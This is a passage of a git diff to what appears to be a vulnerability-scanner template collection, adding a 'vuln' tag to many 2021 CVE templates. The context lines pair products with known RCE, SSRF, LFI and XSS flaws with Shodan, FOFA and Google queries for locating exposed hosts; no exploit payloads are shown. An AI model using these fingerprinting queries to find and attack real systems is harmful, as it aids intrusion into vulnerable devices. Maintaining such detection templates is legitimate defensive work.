b/http/cves/2021/CVE-2021-20031.yaml @@ -26,7 +26,7 @@ info: vendor: sonicwall product: nsa_2650 google-query: inurl:"auth.html" intitle:"SonicWall" - tags: cve,cve2021,sonicwall,redirect,edb,packetstorm + tags: cve,cve2021,sonicwall,redirect,edb,packetstorm,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index 89c65f38147..711e22febbc 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: sonicwall product: sma_200_firmware - tags: cve2021,cve,overflow,rce,sonicwall,kev,vkev + tags: cve2021,cve,overflow,rce,sonicwall,kev,vkev,vuln variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2021/CVE-2021-20086.yaml b/http/cves/2021/CVE-2021-20086.yaml index 1b1f8881415..42c005e308d 100644 --- a/http/cves/2021/CVE-2021-20086.yaml +++ b/http/cves/2021/CVE-2021-20086.yaml @@ -27,7 +27,7 @@ info: vendor: jquery-bbq_project product: jquery-bbq shodan-query: html:"Odoo" - tags: cve,cve2021,odoo,xss,proto,jquery + tags: cve,cve2021,odoo,xss,proto,jquery,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-20090.yaml b/http/cves/2021/CVE-2021-20090.yaml index 33feaa192d1..679a9fbfc08 100644 --- a/http/cves/2021/CVE-2021-20090.yaml +++ b/http/cves/2021/CVE-2021-20090.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: buffalo product: wsr-2533dhpl2-bk_firmware - tags: cve,cve2021,lfi,buffalo,firmware,iot,kev,tenable,vkev + tags: cve,cve2021,lfi,buffalo,firmware,iot,kev,tenable,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index bb6d9439949..b24bcf6adf2 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: buffalo product: wsr-2533dhpl2-bk - tags: cve2021,cve,buffalo,firmware,iot,tenable,vkev + tags: cve2021,cve,buffalo,firmware,iot,tenable,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index c05cae59871..19c454d226d 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: buffalo product: wsr-2533dhpl2-bk_firmware - tags: cve2021,cve,buffalo,firmware,iot,tenable,vkev + tags: cve2021,cve,buffalo,firmware,iot,tenable,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index 03a1d8cc7fe..4afa11c7dae 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: tecnick product: tcexam - tags: cve,cve2021,tcexam,disclosure,exposure,tenable,tecnick + tags: cve,cve2021,tcexam,disclosure,exposure,tenable,tecnick,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 6af7d4d13fa..772947abe25 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -31,7 +31,7 @@ info: - http.html:"VigorConnect" - http.html:"vigorconnect" fofa-query: body="vigorconnect" - tags: cve2021,cve,draytek,lfi,vigorconnect,tenable,kev,vkev + tags: cve2021,cve,draytek,lfi,vigorconnect,tenable,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index ddd9e731501..1a922706184 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -31,7 +31,7 @@ info: - http.html:"VigorConnect" - http.html:"vigorconnect" fofa-query: body="vigorconnect" - tags: cve2021,cve,draytek,lfi,vigorconnect,tenable,kev,vkev + tags: cve2021,cve,draytek,lfi,vigorconnect,tenable,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index 56be48cedb2..e5ecde499c6 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: gryphonconnect product: gryphon_tower - tags: cve2021,cve,xss,tenable,gryphon,gryphonconnect + tags: cve2021,cve,xss,tenable,gryphon,gryphonconnect,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 7a1ee3e435a..22175da421c 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -28,7 +28,7 @@ info: - http.html:"TEW-827DRU" - http.html:"tew-827dru" fofa-query: body="tew-827dru" - tags: cve2021,cve,disclosure,router,tenable,trendnet + tags: cve2021,cve,disclosure,router,tenable,trendnet,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index 6bd5cce6648..2281b8036ab 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -30,7 +30,7 @@ info: - http.html:"TEW-827DRU" - http.html:"tew-827dru" fofa-query: body="tew-827dru" - tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet + tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet,vuln variables: password: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index 17f95ea0894..349e489c9fd 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: netgear product: rax43_firmware - tags: cve2021,cve,tenable,netgear,rce,router,vkev + tags: cve2021,cve,tenable,netgear,rce,router,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 1275e97ba3f..fbd67709da5 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -40,7 +40,7 @@ info: - icon_hash=-1105083093 - body="keycloak" google-query: intitle:"keycloak" - tags: cve2021,cve,keycloak,xss,redhat + tags: cve2021,cve,keycloak,xss,redhat,vuln http: - method: POST diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index 46823d2f2cd..115c3d50878 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -28,7 +28,7 @@ info: vendor: expresstech product: quiz_and_survey_master framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,authenticated,wpscan,expresstech + tags: cve2021,cve,wordpress,wp-plugin,authenticated,wpscan,expresstech,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index f02e7253e38..8aad729c352 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:sixapart:movable_type" fofa-query: title="サインイン | movable type pro" google-query: intitle:"サインイン | movable type pro" - tags: cve2021,cve,packetstorm,rce,movable,sixapart,vkev + tags: cve2021,cve,packetstorm,rce,movable,sixapart,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index 0c6acf7b04e..4fe18c211b8 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -37,7 +37,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve2021,cve,xss,adobe,misc,coldfusion,vkev + tags: cve2021,cve,xss,adobe,misc,coldfusion,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 527e92fec97..4da183a4f4d 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -29,7 +29,7 @@ info: max-request: 4 vendor: spring-boot-actuator-logview_project product: spring-boot-actuator-logview - tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project,vkev + tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index b489560640b..d9962a99716 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -38,7 +38,7 @@ info: google-query: - intitle:"minio browser" - intitle:"minio console" - tags: cve,cve2021,minio,ssrf,oast + tags: cve,cve2021,minio,ssrf,oast,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index 432efddb3bb..c5b0ff1149b 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -26,7 +26,7 @@ info: max-request: 3 vendor: lucee product: lucee_server - tags: cve2021,cve,rce,lucee,adobe,vkev + tags: cve2021,cve,rce,lucee,adobe,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index d8b4cc2fab8..8e522a2848b 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -38,7 +38,7 @@ info: hunter-query: - app.name="Adminer"&&web.body="4.7.8" - app.name="adminer"&&web.body="4.7.8" - tags: cve2021,cve,adminer,ssrf,vkev,kev + tags: cve2021,cve,adminer,ssrf,vkev,kev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index ead39aeda30..0b898d94649 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -27,7 +27,7 @@ info: vendor: systeminformation product: systeminformation framework: node.js - tags: cve,cve2021,nodejs,kev,systeminformation,node.js,vkev + tags: cve,cve2021,nodejs,kev,systeminformation,node.js,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index 30c01fd5205..be3e112b33f 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve2021,cve,xstream,deserialization,rce,oast,xstream_project + tags: cve2021,cve,xstream,deserialization,rce,oast,xstream_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index b5d1b14286d..25ab1637da7 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project + tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 666a23d5968..6dd3e56e384 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -27,7 +27,7 @@ info: vendor: buddypress product: buddypress framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress,vkev + tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 1cb4fcef395..c9872e9cb98 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -38,7 +38,7 @@ info: - body="jellyfin" - title="jellyfin" || body="http://jellyfin.media" google-query: intitle:"jellyfin" - tags: cve,cve2021,jellyfin,lfi,vkev + tags: cve,cve2021,jellyfin,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml index 9bbdac54fbe..e4a25819c71 100644 --- a/http/cves/2021/CVE-2021-21479.yaml +++ b/http/cves/2021/CVE-2021-21479.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: sap product: scimono - tags: cve,cve2021,scimono,rce,sap,vkev + tags: cve,cve2021,scimono,rce,sap,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 889088f607b..7354dd8a52b 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: zte product: mf971r_firmware - tags: cve2021,cve,zte,auth-bypass,router,vkev + tags: cve2021,cve,zte,auth-bypass,router,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index 61a028519e5..cf5ed122dcb 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -33,7 +33,7 @@ info: - http.html:"R-SeeNet" - http.html:"r-seenet" fofa-query: body="r-seenet" - tags: cve2021,cve,xss,r-seenet,advantech + tags: cve2021,cve,xss,r-seenet,advantech,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index d196dde6b7e..5215b3ee3b4 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -31,7 +31,7 @@ info: - http.html:"R-SeeNet" - http.html:"r-seenet" fofa-query: body="r-seenet" - tags: cve2021,cve,xss,r-seenet,advantech + tags: cve2021,cve,xss,r-seenet,advantech,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index e84a7a42659..6b15bf0c3dd 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -28,7 +28,7 @@ info: product: r-seenet shodan-query: http.html:"r-seenet" fofa-query: body="r-seenet" - tags: cve2021,cve,rseenet,xss,graph,advantech,vkev + tags: cve2021,cve,rseenet,xss,graph,advantech,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index c2facfe0c19..3f01f65c0eb 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -28,7 +28,7 @@ info: product: r-seenet shodan-query: http.html:"r-seenet" fofa-query: body="r-seenet" - tags: cve2021,cve,rseenet,xss,advantech + tags: cve2021,cve,rseenet,xss,advantech,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index 9cc76cf155e..4d3df0937b8 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -28,7 +28,7 @@ info: product: r-seenet shodan-query: http.html:"r-seenet" fofa-query: body="r-seenet" - tags: cve2021,cve,rseenet,xss,advantech + tags: cve2021,cve,rseenet,xss,advantech,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index 0a2b641e240..80536c8a302 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -33,7 +33,7 @@ info: - http.html:"R-SeeNet" - http.html:"r-seenet" fofa-query: body="r-seenet" - tags: cve2021,cve,rce,r-seenet,advantech,vkev + tags: cve2021,cve,rce,r-seenet,advantech,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index dd7b2f50d45..62452f06124 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dlink product: dir-3040_firmware - tags: cve2021,cve,dlink,exposure,router,syslog + tags: cve2021,cve,dlink,exposure,router,syslog,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml index 8cd5ec90eee..5a6664e3795 100644 --- a/http/cves/2021/CVE-2021-21881.yaml +++ b/http/cves/2021/CVE-2021-21881.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: lantronix product: premierwave_2050_firmware - tags: cve2021,cve,lantronix,rce,oast,cisco,vkev + tags: cve2021,cve,lantronix,rce,oast,cisco,vkev,vuln variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index aca568249e4..046002c08f3 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: cloud_foundation - tags: cve2021,cve,vmware,rce,vcenter,kev,packetstorm,vkev + tags: cve2021,cve,vmware,rce,vcenter,kev,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml index 80c73dec399..67a652a590e 100644 --- a/http/cves/2021/CVE-2021-21973.yaml +++ b/http/cves/2021/CVE-2021-21973.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: cloud_foundation - tags: cve2021,cve,vmware,ssrf,vcenter,oast,kev,vkev + tags: cve2021,cve,vmware,ssrf,vcenter,oast,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml index 63a020cd47b..8fed91da8e6 100644 --- a/http/cves/2021/CVE-2021-21975.yaml +++ b/http/cves/2021/CVE-2021-21975.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: vmware product: cloud_foundation - tags: cve2021,cve,kev,packetstorm,ssrf,vmware,vrealize,vkev + tags: cve2021,cve,kev,packetstorm,ssrf,vmware,vrealize,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 92833adde22..a2838990e1c 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -30,7 +30,7 @@ info: max-request: 1 vendor: vmware product: view_planner - tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive,vkev + tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index a3baf9be14d..37e2c75ea7b 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: vmware product: vcenter_server - tags: cve2021,cve,packetstorm,rce,vsphere,vmware,kev,vkev + tags: cve2021,cve,packetstorm,rce,vsphere,vmware,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index 4239f43eeb9..b10e0106e29 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: vmware product: cloud_foundation - tags: cve2021,cve,vmware,vcenter,fileupload,kev,intrusive,vkev + tags: cve2021,cve,vmware,vcenter,fileupload,kev,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index b667995f81a..e2a6dd023db 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: vmware product: spring_cloud_netflix - tags: cve,cve2021,rce,spring,vmware,vkev + tags: cve,cve2021,rce,spring,vmware,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index 1687b60903a..7423e09889d 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -30,7 +30,7 @@ info: fofa-query: - banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" - banner="/airwatch/default.aspx" || header="/airwatch/default.aspx" - tags: cve2021,cve,vmware,workspace,ssrf,vkev + tags: cve2021,cve,vmware,workspace,ssrf,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 1de5d048cca..40db3fa981d 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"fortiweb - " fofa-query: title="fortiweb - " google-query: intitle:"fortiweb - " - tags: cve2021,cve,fortiweb,xss,fortinet,vkev + tags: cve2021,cve,fortiweb,xss,fortinet,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index 7b76194918e..8d5b3b5ff6b 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -28,7 +28,7 @@ info: vendor: elastic product: elasticsearch fofa-query: index_not_found_exception - tags: cve2021,cve,elasticsearch,packetstorm,elastic + tags: cve2021,cve,elasticsearch,packetstorm,elastic,vuln http: - method: POST diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 4b5bca76e11..92a24f8c7a1 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -35,7 +35,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve2021,cve,kev,hackerone,gitlab,rce,vkev + tags: cve2021,cve,kev,hackerone,gitlab,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index 9dba9a1c18e..c07e5d7935e 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -37,7 +37,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve2021,cve,gitlab,ssrf,vkev + tags: cve2021,cve,gitlab,ssrf,vkev,vuln http: - method: POST diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml index 9162e36abc8..8cc36d23e2f 100644 --- a/http/cves/2021/CVE-2021-22502.yaml +++ b/http/cves/2021/CVE-2021-22502.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microfocus product: operation_bridge_reporter - tags: cve2021,cve,microfocus,obr,rce,kev,vkev + tags: cve2021,cve,microfocus,obr,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index f501d083c37..652b8cbfd41 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -32,7 +32,7 @@ info: - title="EVSE web interface" - title="evse web interface" google-query: intitle:"evse web interface" - tags: cve2021,cve,evlink,auth-bypass,schneider-electric,vkev + tags: cve2021,cve,evlink,auth-bypass,schneider-electric,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index e6dc61d41ee..cb26867f1ad 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -35,7 +35,7 @@ info: - icon_hash=106844876 - title="revive adserver" google-query: intitle:"revive adserver" - tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver,vkev + tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 0ca4c54a8cb..e0a4aaa8176 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -34,7 +34,7 @@ info: - http.title:"rocket.chat" fofa-query: title="rocket.chat" google-query: intitle:"rocket.chat" - tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli,vkev + tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index e202e5fe2b8..52011ef6b67 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" - tags: cve,cve2021,bigip,rce,kev,packetstorm,f5,vkev + tags: cve,cve2021,bigip,rce,kev,packetstorm,f5,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index 38fecabab43..703a4420cba 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mercusys product: mercury_x18g_firmware - tags: cve2021,cve,iot,lfi,router,mercusys + tags: cve2021,cve,iot,lfi,router,mercusys,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index 4991f065d7a..436e905e2df 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -29,7 +29,7 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus + tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus,vuln variables: string: "CVE-2021-24145" diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index 9562d21c343..4e2934102c6 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -28,7 +28,7 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: cve,cve2021,wpscan,packetstorm,wordpress,wp-plugin,webnus + tags: cve,cve2021,wpscan,packetstorm,wordpress,wp-plugin,webnus,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index bee0a84359a..8d8054e26eb 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -28,7 +28,7 @@ info: vendor: likebtn-like-button_project product: likebtn-like-button framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project + tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index a26acd9804e..64ad3685fb3 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -29,7 +29,7 @@ info: vendor: backup-guard product: backup_guard framework: wordpress - tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard + tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index 7008e91850e..0a3420d8dd4 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.html:/wp-content/plugins/ninja-forms/ fofa-query: body=/wp-content/plugins/ninja-forms/ publicwww-query: /wp-content/plugins/ninja-forms/ - tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms + tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index 1971d97efed..f9b28561854 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -29,7 +29,7 @@ info: vendor: algolplus product: advanced_order_export framework: wordpress - tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus + tags: 